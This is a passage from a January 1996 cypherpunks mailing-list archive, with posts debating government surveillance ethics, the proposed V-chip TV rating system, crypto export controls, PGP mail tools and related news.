> read another's mail, it is a duty.

I am a funny sort of person. I don't believe that governments should
be able to do anything that individuals cannot. If it is bad for me to
steal, it is also bad for a government official to steal. If it is bad
for me to listen in on my neighbor's phone calls, it is bad for the
government, too.

I have no evidence that becoming a member of a government agency
grants one absolution from sin. By my book, murdering, invading
privacy, and all the rest are bad, and I see no reason to expect that
just because you've been "ordered" to do them they become good.

> By not taking adequate steps to inform itself of the Japaneese
> intentions the US suffered the loss of a substantial part of the US
> fleet at Pearl Harbour. Had sufficient resources been avaliable the
> naval codes could have been cracked in time.

I suspect that mass surveilance of the entire U.S. population by the
government could in fact dramatically reduce crime. Should we do it?

I suspect that I could substantially improve my position in life by
listening in on other people's phone calls and reading their
mail. I might even be able to stop crimes directed against my person
by doing so. Should I do it?

I do not mean to pretend that there is an absolute ethics. I merely
claim that I do not find in my mind an easy distinction between the
acts of a government official under color of authority and the acts of
any other individual.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Fri, 26 Jan 1996 11:15:52 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: V-chip?
In-Reply-To: <Pine.SOL.3.91.960124174011.17116A-100000@echo.sound.net>
Message-ID: <199601252305.RAA03150@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) said:

MD> oO F145C0 Oo <fiasco@echo.sound.net> writes:
>> Apparently the US government is planning on starting up its V-chip
>> program again, which will allow public/cable TV to be censored at
>> will. What does everyone thing about this ploy?

	Yes, it is censorship.  At least, it is if you aren't watching
every program on every channel available to you right now, because
your channel selection allows you to censor public/cable TV at will
right now, without the V-Chip.  What the V-Chip does is allow you to
censor what is shown on your television, even in your absence.  I'll
concede that there are positive aspects to this for parents, but I
resent the 'you must install it in all TVs' part. If enough people
want it, they can get TVs with it.

>> And whats next? Chips in my radio, to prevent music, or a chip in
>> my phone to make sure i dont call anyone bad? The V-chip is just as
>> much a privacy/1st amendment violation as the clipper chip
>> is/was. I believe the worst part of the V-chip plan, is to force
>> all new TV's manufactured or imported to the US, to have this new
>> chip. Could this chip even be part of a Chinese lottery?

MD> As I understand it, the basic concept behind the V-Chip is to
MD> allow selective blocking of material a particular viewer might
MD> find offensive based on content information transmitted along with
MD> the program.  As long as the program material itself is
MD> transmitted unaltered, and there are multiple non-governmental
MD> providers of content descriptions catering to the spectrum of
MD> human likes and dislikes, this sounds like ideal Cypherpunk
MD> technology.

	The content information is transmitted as part of the program,
in the between-frame band which is normally not in the displayed area
of the picture, not on a separate signal.  (Now why can't they use
this band for something truely useful, like an automatic time sync and
VCRPlus ID, so that your VCR could pick it up, and know that VCRPlus
ID 69 is on channel 13, and is broadasting with a +2:30 skew from what
you think the time is?)  Because of this, there will be _one_ content
code, not a select-your-rater content method.

	The other reason for not having a select-your-rater method is,
first, the sheer volume of TV broadcasting.  No service could possibly
rate all TV content.  Second, no service could rate _live_ TV, such as
the nightly news, or post-game NFL locker room films.  My guess is
that the producer of a program will get first shot at putting a label
on a program, or not.  Then the distributor will be able to keep the
producers label, change it, add their own, or remove it.  This will
continue until the broadcaster gets to decide whether or not to
transmit a V-Code, and whether to use the last distributors label or
their own.  But do you really think that MTV will use a V-Code?  (It
could be amusing if they did - 10 minutes of blank screen, then 2
minutes of commercials when someone cranks all of their settings to
Full Filter.)

[...]

MD> It should be noted that the V-Chip is currently vaporware, and
MD> exists only in the minds of politicians.  There probably will
MD> never be an actual "V-Chip", just a little additional software in
MD> our already heavily computerized televisions, radios, and personal
MD> computers.

	Incorrect.  The 'V-Chip' exists (at least according to a
demonstration on NBC News ("Home of the Exploding Chevy") the other
night), there just isn't sufficient consumer demand for it to have hit
the market yet.  And, from appearances, it doesn't pixelate the
picture, it blocks the signal entirely.  They should at least have put
a 'Sorry, kiddies, you have to hack your parents passcode to see
this.' message up.  That's the weakness here - it was only a 4 digit
passcode locking the V-Chip level - does anyone really think that some
kid who wants to watch HBO or MTV isn't gonna cycle through the
numbers, even if it is only a few dozen at a time?  Or that there
isn't a reset mechanism for when Pop forgets the code and he really
wants to watch 'Showgirls' on PPV?

-- 
#include <disclaimer.h>				/* Sten Drescher */
1973 Steelers    About Three Bricks Shy of a Load    1994 Steelers
1974 Steelers         And the Load Filled Up         1995 Steelers?
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Fri, 26 Jan 1996 11:06:20 +0800
To: cypherpunks@toad.com
Subject: Re: Random Number Generators
Message-ID: <199601252307.QAA15015@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes PERRYMOOSE (tm), this IS crypto related.

The Hypothesis:

Now....there oughta be a way to generate random numbers
using the signal to noise ratio of just this very list!

No, I'm not good at this sort of thing (we all know that)
but it is there as a random variable, within a random variable.

It's better than a clock for everyone gets messages differently.

But you can change the s/n ratio and durations of s/n to generate
the numbers on, so that it'd be pretty secure.

Something to think about :)

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 26 Jan 1996 12:58:17 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in Eudora and other mail programs
In-Reply-To: <v02120d06ad2da5af828f@[192.0.2.1]>
Message-ID: <Pine.ULT.3.91.960125170206.11995G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Lucky Green wrote:

> At 11:54 1/25/96, Timothy C. May wrote:
> 
> >(I understand from this list that Eudora for Windows is now doing this much
> >more automatically, that someone has a PGP-in-Eudora package. I don't think
> >it was from Qualcomm, but I could be wrong. As a Macintosh version user,
> >I'm hoping this comes to the Mac version as well.)
> 
> There exist two Eudora/PGP packets. The MacPGP Kit and MacPGP Control. I'd
> use MacPGP Control. Just do a search for it.

I tried 'em both and found them dog slow and unreliable, like most other
things based on AppleEvents. True command-line piping and DDE work in
UNIX/DOS/Windows, but there's none of that on the Mac. What I've done is
ResEdit key combinations into my software to do wordwrap, then I cut text,
switch to the PGP window, sign or encrypt the clipboard, switch back to
the mail/news window, and paste. MacPGP's "dialog shortcuts" make this
mostly painless. We don't need no steenking automation. 

Of course this doesn't work for attaching files, but I do that
sufficiently rarely that the minor pain of handling that case manually is
outweighed by the interest of minimizing the gunk in RAM and on the menu
bar. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 27 Jan 1996 17:19:44 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: "This post is G-Rated"
In-Reply-To: <199601252156.NAA28375@netcom6.netcom.com>
Message-ID: <9601252333.AA29175@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
 > However is should be possible for TV programs

Maybe, until it becomes common for "TV programs" to be accessible by
URL...

 > and whole newsgroups.

Since nobody "owns" newsgroups, and nobody controls what's posted to
them, I don't see how that's possible at all.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 28 Jan 1996 02:05:21 +0800
To: Cypherpunks <shamrock@netcom.com (Lucky Green)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <v02120d0bad2cdd10a2c8@[192.0.2.1]>
Message-ID: <m0tfaJk-0004MUC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

: At 13:06 1/24/96, Andrew Loewenstern wrote:
: 
: >Why not just print out all of the source code to Navigator (crypto and all)
: >in a nice OCR font?  Paper is exportable.  Then you would 'only' have to sca
: n
: >it back in and debug it.
: 
: That would be giving away the store to the competition.

An there is no assurance that the paper on which the code is printed
would be exportable.  Remember the boyos decide each case on a case by
case basis.  All they would have to do is notify Netscape that it
would be a violation to export the paper without a license, and
Netscape would be forced to stop it.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 26 Jan 1996 13:33:50 +0800
To: cypherpunks@toad.com
Subject: Etch-a-sketch
Message-ID: <v02120d03ad2dde36e0e7@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


Ok.. I'm still getting mail regarding the etch-a-sketch keychain. Thus
I'm going to look at how to get em for everyone. :)

Just letting you all know. Don't bury me in 'I want one mail.' As soon as
I have the info I'll get it out to the hungry crowd. Heh. At that point
you can bury me happily.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 26 Jan 1996 10:17:02 +0800
To: dan@milliways.org (Dan Bailey)
Subject: Re: Bernie S. Sentencing
In-Reply-To: <199601251509.KAA21760@remus.ultranet.com>
Message-ID: <0l20Ru200bky0CS0o0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 25-Jan-96 Bernie S. Sentencing by
Dan Bailey@milliways.org 
> I just found out that Bernie S. will be sentenced this Friday morning
> at 9 am in Easton, PA for the crime of removing batteries from a tone
> dialer several years ago. This is defined as a victimless misdemeanor
> for which the judge in this small town (under considerable influence
> from the Secret Service) set bail at $250,000. He could get two years
> in prison at sentencing. Press attention could be very helpful in
> avoiding a sentence as irrational as the bail setting - right now the
> only influence these people are getting is from the Secret Service and
> they want to put Bernie S away for as long as they can. If you're not
> entirely up to date on this story, finger bernies@2600.com for all of
> the details.

I've contacted an editor I know at the Allentown Morning Call (the major
newspaper in the Easton, PA area) and a staffwriter I know at the
Philadelphia Inquirer.

No word from the Inquirer yet, but the Morning Call seems interested --
email me for the editor's email address/phone number. Other folks can
probably give better background than I can.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 26 Jan 1996 10:26:50 +0800
To: cypherpunks@toad.com
Subject: Security First Network Bank, FSB. The World's 1st Internet Bank
Message-ID: <9601252251.AA02911@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just got something in the post today asking for me to set up an account with
them...

- Daily reconciled bank statement and checkbook register; All transactions
are logged for you.
- No min balance
- 20 free electronic bill payments per month...
- ATM at Honor and Cirus..
- 200 free paper checks...
- plenty of pre-stamped deposit envolopes
- FDIC insured accounts (in case anyone ever steals my password..)
- Wired Funds..


I haven't check out the web sight yet but it is at http://www.sfnb.com

If there are no fees, I just might do it anyways and get the free-tshirt
they are offering me! <grin>
_______________________
Regards,               Quarrels would not last long if the fault were only on
		       one side. -Francois de La Rochefoucauld
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sat, 27 Jan 1996 17:14:42 +0800
To: cypherpunks@toad.com
Subject: Reply: "This post is G-Rated"
Message-ID: <199601260001.RAA04514@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Nice addition to your .sig!

root@heavily.censored.org....(lightly.censored.org coming soon) :)

At 11:18 AM 1/25/96 -0800, you wrote:
>[This post is classified as G-Rated by Tim May.
>I see no agreed-upon labelling convention emerging. Fortunately.
>
>--Tim May
>
>Boycott espionage-enabled software!
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 12:47:22 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <ad2d61980e02100491f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:58 PM 1/25/96, Bill Frantz wrote:

>goal.  The big problem is how are the labels attached to the programs.  I
>agree with Tim that it is probably imposible for individual Usenet
>postings.  However is should be possible for TV programs, and whole
>newsgroups.

Coincidentally, after writing my post this morning, I saw a report on CNN
or CNBC about how broadcasters, networks, and producers are strongly
opposed to the mandatory V-chip. Not news, but some of there reasons were:
not enough time.

The movie business produces about 600 hours of product per year, and the
~weeks it takes for the MPAA to view the final product and rate it (and
then negotiate with the director about cutting out scenes to make an
R-rated film into a PG, etc.) is marginally tolerable.

Such is not the case with television, with many shows in a final version
only hours before broadcast (and obviously some with even less or no
advance time available).

And remember that the MPAA rating is most definitely NOT a "self-rating."

I see self-ratings of Usenet and mailing list posts as possible, just
nearly worthless. And the reall contoversial stuff, this kind of goddamned
fucking shit, will not get screened out. After all, I voluntarily rated
this thread "G," and look what got through! (And it's only the tit of the
iceberg, so to speak.)

A meaningful "parental filter" cannot be done on-the-fly with self-ratings.
Some minor steps can be taken, but not all worth the expense and hassle of
a mandatory system.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Fri, 26 Jan 1996 13:07:10 +0800
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: RANT: cypherpunks do NSA's job for them!!
In-Reply-To: <9601252218.AA12260@alpha>
Message-ID: <Pine.LNX.3.91.960125180104.228F-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 25 Jan 1996, Mike McNally wrote:

> Date: Thu, 25 Jan 1996 16:18:47 -0600
> From: Mike McNally <m5@dev.tivoli.com>
> To: "Vladimir Z. Nuri" <vznuri@netcom.com>
> Cc: cypherpunks@toad.com
> Subject: RANT: cypherpunks do NSA's job for them!! 
> 
> 
> Vladimir Z. Nuri writes:
>  > when you tell them that "what you are doing breaks the law", you
>  > are implicitly revealing that *you*support*that*law*.
> 
> That assertion is, I claim vociferously, false.  False false false.

i have to agree.  there is a huge difference in telling someone that
they're breaking the law and supporting a law.

as far as i'm concerned, on cypherpunks we try to disect laws or
regulations so that we can chip away at weaknesses in them.  it is
also useful if one wants to determine how your oppenent is going to
react when you do something; know your enemy and all that.

- -pat


"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)

zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMQgpH03Qo/lG0AH5AQHDKwQAqB8FEpPF0j+rTZUme+n/Fv4So/EIfEQr
tHyjDpaFh1iRcHP/8wOJaazEsYFFrgo/J3gmna7md31xFhV6SPF1eOY4rEKpTz01
qFsinS0lhwXiXTCnvWlzHnOIKC6B6El4aVI4Wo1E39xMX3abm2Euxo2t5a6va8lC
5/M8p4ANrxk=
=VdvL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 26 Jan 1996 13:57:52 +0800
To: cypherpunks@toad.com
Subject: Re: V-chip?
In-Reply-To: <199601252305.RAA03150@grendel.texas.net>
Message-ID: <199601260208.SAA02439@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sten Drescher <stend@grendel.texas.net> writes:

 > Yes, it is censorship.  At least, it is if you aren't
 > watching every program on every channel available to you
 > right now, because your channel selection allows you to
 > censor public/cable TV at will right now, without the
 > V-Chip.  What the V-Chip does is allow you to censor what is
 > shown on your television, even in your absence.

Right.  Freedom of TV viewing belongs to those who own one, even
if they are not always there to supervise the use of the set.
Exactly like freedom of the press.

I personally plan to instruct my TV to display only material
which does not offend my neo-Pagan, Bohemian, and Hedonistic
beliefs.

 > I'll concede that there are positive aspects to this for
 > parents, but I resent the 'you must install it in all TVs'
 > part. If enough people want it, they can get TVs with it.

The last great adventure in forcing manufacturers to put
something in a television set was the "UHF must tune as easily as
VHF" boondoggle.  The number of UHF stations in most areas was
0-1. Note that when cable provided a plethora of channels in a
previously untunable part of the spectrum, market forces
instantly resulted in the creation of "cable-ready" sets in
advance of government prodding.

 > The content information is transmitted as part of the
 > program, in the between-frame band which is normally not in
 > the displayed area of the picture, not on a separate signal.

There is currently no official standard for encoding content
information for television programs.  Manufacturers of various
flavors of "parental control devices" have at times demonstrated
their technology as the "V-Chip" on Network Nightly News
programs. This includes devices which can do selective
pixelation, as well as those which merely render the set
inoperative during programs having a specific rating.

The bandwidth required to transmit content information second by
second is very small. It is not a foregone conclusion that such
information will be carried exclusively via the video blanking
intervals, or that it will be available from only a single
source. Indeed, with the movement towards digital encoding of
television, it is doubtful that blanking intervals themselves
will be around much longer.

 > The other reason for not having a select-your-rater method
 > is, first, the sheer volume of TV broadcasting.  No service
 > could possibly rate all TV content.  Second, no service
 > could rate _live_ TV, such as the nightly news, or post-game
 > NFL locker room films.

No one is suggesting that all raters will rate all programming.
Movies will probably be the first things raters will provide
content tracks for.  Next will be widely carried programs in
syndicated reruns, and top rated first run shows.

Eventually, use of the technology will proliferate, much as the
use of closed-captioning has.

Much money will be saved in not having to physically edit media,
and in having the intelligence at the displaying end. One will no
longer have to have a theatrical release of a movie, a television
version, a version for European airlines, a version for American
airlines, a version for Islamic airlines, etc ad nauseum.  Porn
will no longer have to be edited into Hard-X, Soft-X, and R
versions before being distributed.

 > Incorrect.  The 'V-Chip' exists (at least according to a
 > demonstration on NBC News ("Home of the Exploding Chevy")
 > the other night), there just isn't sufficient consumer
 > demand for it to have hit the market yet.  And, from
 > appearances, it doesn't pixelate the picture, it blocks the
 > signal entirely.

Please see prior comments about Nightly News demonstrations of
alleged V-Chip technology.

Once a standard for encoding content information is established,
it is unlikely that there will be some universal specific
"V-Chip" that will be used by all manufacturers.  Instead, the
functionality will likely be implemented in whatever software
controls the display appliance.  It's not a complicated
application, and hardly worth a processor of its own.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 07:46:25 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <ad2d64060f0210042426@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 1/25/96, Mike McNally wrote:
>Bill Frantz writes:

> > and whole newsgroups.
>
>Since nobody "owns" newsgroups, and nobody controls what's posted to
>them, I don't see how that's possible at all.

I agree. When I was replying to Bill Frantz's points, I neglected to
comment on this point.

Suppose "alt.fan.barney" is rated G, by "someone." Since I can post stuff
with strong language, and worse, to alt.fan.barney, is it still rated G, or
was my stuff blocked?

When the Germans told MeinKampfuServe to block 200+ newsgroups (well, it's
clear that some BavarianKops showed MKS a list of groups that they thought
needed to be pulled, and MKS obliged them), a bunch of folks started
copying soc.culture.german on some highly explicit stuff normally found in
alt.sex.*. No word yet on whether soc.culture.german is now banned in
Germany.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 13:03:52 +0800
To: cypherpunks@toad.com
Subject: Using the V-chip to Filter Commercial Advertisements
Message-ID: <ad2d664210021004aa6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 PM 1/25/96, Sten Drescher wrote:

>their own.  But do you really think that MTV will use a V-Code?  (It
>could be amusing if they did - 10 minutes of blank screen, then 2
>minutes of commercials when someone cranks all of their settings to
>Full Filter.)

One way to kill the V-chip dead is to announce hacks to the V-chip box that
will do the _reverse_ of this: block commercials (advertisements, for any
non-American readers) but pass programs.

(Before anyone points out that such boxes have been built, based on volume
levels, spectral content, etc., sure. What I'm speculating about is a
subversive campaign to get the meme out there that the V-chip can be used
as a filter of commercials.)

Even if it is not done, fear of the possibility of this will kill the proposal.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 26 Jan 1996 12:48:43 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: RANT: cypherpunks do NSA's job for them!!
In-Reply-To: <9601252218.AA12260@alpha>
Message-ID: <9601260028.AA12225@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri writes:
 > the Tao of bad government: if you really want to get rid of a law,
 > act and think at all times as if it doesn't even exist.

I accept that that's one way of going about things, but I challenge
you to demonstrate conclusively that it is the only means to generate
political interest in opposition to a law.  I happen to disagree with
this, and I refuse to accept the wacky notion that by explaining to
somebody that what they're doing is in violation of a pointless stupid
law, and explaining why it's only through wide exposure of that
pointless stupidity that the law and others like it can be struck
down, that I am unwittingly strengthening the law.  Balderdash.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 28 Jan 1996 03:45:32 +0800
To: cypherpunks@toad.com
Subject: Re: Belgium has 'key escrow' law
Message-ID: <v0213050cad2ddf2eecd7@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I should also point out that Belgium apparently has crypto
export laws of sufficient complexity to inspire me to look
elsewhere when attempting to purchase a hardware encryption
board from a Belgian company (uti-maco). Said company also
was under the mistaken belief that I needed a US _import_
license; my failed attempts to persuade them otherwise was
the final kicker.

------                                                             ------
Douglas Barnes         "The tighter you close your fist, Governor Tarkin,
cman@communities.com    the more systems will slip through your fingers."
cman@best.com                                             --Princess Leia






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sat, 27 Jan 1996 17:20:08 +0800
To: hallam@w3.org
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <9601252108.AA13595@zorch.w3.org>
Message-ID: <Pine.3.89.9601251855.A12680-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


I might suppose that a significant reason why the nuclear arms race did 
not come to blows was the balance of espionage between NSA/CIA/KGB etc. 
With accurate information on your enemy, one is less likely to be 
panicked into a preemtive strike.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 

On Thu, 25 Jan 1996 hallam@w3.org wrote:

> By not taking adequate steps to inform itself of the Japaneese intentions the US 
> suffered the loss of a substantial part of the US fleet at Pearl Harbour. Had 
> sufficient resources been avaliable the naval codes could have been cracked in 
> time.  The closure of the Black chamber was a key reason why US espionage 
> efforts were inadequate at the start of WWII.
> 
> Given the choice between the US Army and the CIA plus NSA I would choose the 
> latter any day. The millitary hardware is useless without intelligence 
> operatives. Unless Perry is advocating an absolutist pacifist stance I don't see 
> that his stance is credible. I don't know many pacifists who oppose intelligence 
> gathering. 
> 
> Diplomatic trafic has always been considered fair game. Long may it remain so.
> 
> 
> 		Phill
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 27 Jan 1996 17:20:01 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: TOP_tap
In-Reply-To: <9601251755.AA15764@sulphur.osf.org>
Message-ID: <199601252341.SAA00886@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The NSA is a branch of the DOD.
> 
> Up until recently (18-30 months ago) NSA employees were only allowed
> to identify themselves as employees of DoD.  It was common knowledge,
> that unspecific references to Fort Meade meant NSA; and if you saw
> a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
> it.
> 	/r$


But many folks from Tim May High School ;-} also have DOD "status".
And so do all the DIA, various serviec agencies & likely the gardener..

Net result, you're no smarter than when you started out....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Jan 1996 03:50:25 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601260152.UAA16955@jekyll.piermont.com>
Message-ID: <Pine.ULT.3.91.960125181427.13398E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Perry E. Metzger wrote:

> Rich Graves writes:
> > On Thu, 25 Jan 1996, Perry E. Metzger wrote:
> > > I am a funny sort of person. I don't believe that governments should
> > > be able to do anything that individuals cannot. If it is bad for me to
> > > steal, it is also bad for a government official to steal. If it is bad
> > > for me to listen in on my neighbor's phone calls, it is bad for the
> > > government, too.
> > 
> > Er, I believe the above was clearly intended to mean "for one government
> > to read another government's mail." 
> 
> I'm funny in more ways than one. I don't believe in the existence of
> "Governments". 

I agree. This post was very funny, in the normal sense of the word.

...
> In any case, we are here expected to believe that it is okay if the
> Secular God of our land mass, our Government, spies on the Secular
> Gods of other land masses. However, viewed from my perspective, when
> "the Government" of our land listens in on "another Government's"
> communications, from what I can tell what is happening is that
> individual humans in the guise of High Priests converge at their
> temple in Fort Meade for the purpose of listening in on conversations
> between individuals humans elsewhere who are associated with other
> Government cults in some sort of ordained capacity. One might argue
> that this discourtesy between the followers of rival cults is not
> something for we, the arch-atheists, to care about, but I must note
> that in principle what is going on is the same -- people are listening
> in on other people's communications -- not the Divine Governmental
> Being itself listening in on the communications of other Divine
> Governmental Beings. These Divine Governmental Beings don't
> exist. Only the humans claiming the authority of the Divine
> Governmental Beings exist.

Therefore, to ordain myself Devil's Advocate Being, is it not wrong, in
